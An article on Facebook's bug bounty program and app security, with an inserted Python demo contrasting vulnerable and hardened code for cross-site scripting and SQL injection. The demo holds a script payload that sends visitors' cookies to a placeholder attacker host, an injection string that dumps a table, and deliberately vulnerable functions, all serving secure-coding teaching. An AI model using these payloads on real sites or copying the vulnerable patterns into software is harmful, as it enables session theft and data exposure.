Patrick Lambert looks at Facebook's recent attempts to reward bug hunters on their site and help fight the rising tide of malware and other scams.
It's no secret that the bad guys go where the money is. Put enough people in one place, with enough possible attack vectors, and you will quickly find a lot of eyes looking for opportunities. Whether through scams, hacks, or any other kind of vulnerability, Facebook has become a prime target. With over 800 million users, it's no surprise that the site is home to more than photo sharing and status updates. It's also where a lot of scams happen, and any time a bug or hole is found, exploits follow very quickly. The company has been hit pretty hard lately on that front, but it isn't sitting still either; it is now going further than most companies in rewarding bug hunters.
You don't have to go back far to find these problems cropping up on the site. Just last month, private photos of Mark Zuckerberg were exposed to the world after a bug was found in the latest privacy settings. According to Facebook PR, the bug was live only for a limited period of time, but for a target of such importance, that's plenty of time to grab the founder's private items and publish them. Who knows how many other users were hit as well? People have long complained that the site's privacy settings are badly implemented and confusing, and every new release also brings the possibility of new bugs and errors. That is the window attackers wait for, and when new scams and malware get deployed. It seems to take only a few hours for an exploit of a new Facebook bug to appear, and sometimes much longer for the bug to be fixed.
We found that on average the applications assessed had vulnerabilities in 2.5 vulnerability classes (e.g. Cross Site Scripting or SQL Injection), and none of the applications were completely free of vulnerabilities. Given the attack surface of these applications is so small, this is a somewhat surprising statistic.
Whether that's surprising is up for debate. It's no surprise that most newly written code is buggy. The problems aren't limited to honest coding errors either. A lot of apps are written for malicious purposes in the first place, with scams being very popular. Whether users are lured by the promise of a free iPad or by a fake contest, an app can learn a lot about every user who clicks "Yes" in the little permissions dialog that pops up, since that click hands the app access to profile data.
The number of web sites with simple XSS or SQL injection issues is very high, and new sites are hacked almost daily. But when you write a Facebook app, you're no longer a small site where only your own users are at risk. Suddenly you're part of the Facebook ecosystem, and any Facebook user becomes a potential target. Apps interact with the rest of Facebook through the API, and even though those calls happen behind the scenes, they are in a sense more important than the visible site itself, since that is the path over which so much user data moves. If there's a problem on that end, ordinary users are unlikely to see it and report it, but the developers and researchers who dig into those API calls certainly will.
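The two vulnerability classes the quoted study names, cross-site scripting and SQL injection, look the same in a Facebook app as on any other site. The following is an added example, not code from the original article and not Facebook's or any real app's code: a toy "you won a contest" page of the kind a scam or a careless app might serve, with each flaw shown beside its fix. The table, the user ids, the e-mail addresses and the attacker hostname are all constructed for the demo.

```python
"""Added example (not from the article): XSS and SQL injection in a toy
contest page, each beside its hardened form. All data is constructed."""
import html
import sqlite3

# --- Cross-site scripting ---------------------------------------------------
def render_greeting_vulnerable(name: str) -> str:
    # Untrusted input pasted straight into HTML: a name containing <script>
    # runs in every visitor's browser, inside the app's origin.
    return f"<h1>Congratulations {name}, you won!</h1>"

def render_greeting_hardened(name: str) -> str:
    # html.escape turns < > & " ' into entities, so the browser shows the
    # payload as text instead of executing it.
    return f"<h1>Congratulations {html.escape(name, quote=True)}, you won!</h1>"

# --- SQL injection ----------------------------------------------------------
def make_db() -> sqlite3.Connection:
    # Constructed sample data: hypothetical contest entries, one per user id.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (uid TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO entries VALUES (?, ?)",
        [("1001", "alice@example.com"), ("1002", "bob@example.com")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, uid: str) -> list:
    # String formatting lets the caller rewrite the WHERE clause.
    rows = conn.execute(
        f"SELECT email FROM entries WHERE uid = '{uid}'"
    ).fetchall()
    return [r[0] for r in rows]

def lookup_hardened(conn: sqlite3.Connection, uid: str) -> list:
    # Bound parameter: the driver passes uid as data, never as SQL text.
    rows = conn.execute(
        "SELECT email FROM entries WHERE uid = ?", (uid,)
    ).fetchall()
    return [r[0] for r in rows]

def demo() -> dict:
    # Constructed payloads; attacker.example is a placeholder hostname.
    xss_payload = ("<script>document.location='http://attacker.example/?c='"
                   "+document.cookie</script>")
    sqli_payload = "1001' OR '1'='1"
    conn = make_db()
    return {
        # True: raw <script> tag survives into the page
        "xss_vuln_executes": "<script>" in render_greeting_vulnerable(xss_payload),
        # False: escaped to &lt;script&gt;
        "xss_fixed_executes": "<script>" in render_greeting_hardened(xss_payload),
        # 2: the OR clause dumps every entrant's e-mail
        "sqli_vuln_rows": len(lookup_vulnerable(conn, sqli_payload)),
        # 0: no uid literally equals the payload string
        "sqli_fixed_rows": len(lookup_hardened(conn, sqli_payload)),
    }

if __name__ == "__main__":
    print(demo())
```

The XSS case is the more dangerous one in an app context: the injected script runs with whatever the app's page can reach, and a scam app that has already been granted permissions can relay what it collects to any host it likes.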
Facebook knows that bugs must be found and fixed quickly, which is why it implemented a bug bounty program, as Google, Mozilla, and many other companies have done. The idea is that when a white hat hacker finds a vulnerability and reports it to the company, instead of exploiting it, they are rewarded with cash. Recently, Facebook has gone a step further: it now issues debit cards to researchers who report bugs, and loads the reward for each accepted report onto the card. It's a somewhat innovative way to do things, and it lets researchers show off that they really are part of the bug bounty program.
Overall, there's no question that Facebook will remain a prime target for malware, scams, and the like. It's just too big a system to be left alone, and as more and more features are added to the site and the API, bugs are going to keep popping up. The question isn't whether more large problems will appear, but how fast they will be handled. Keeping a site like Facebook safe and secure is a real challenge, and a never-ending effort for the company's engineers. For white hat hackers, bug hunting on Facebook might turn into a solid source of income.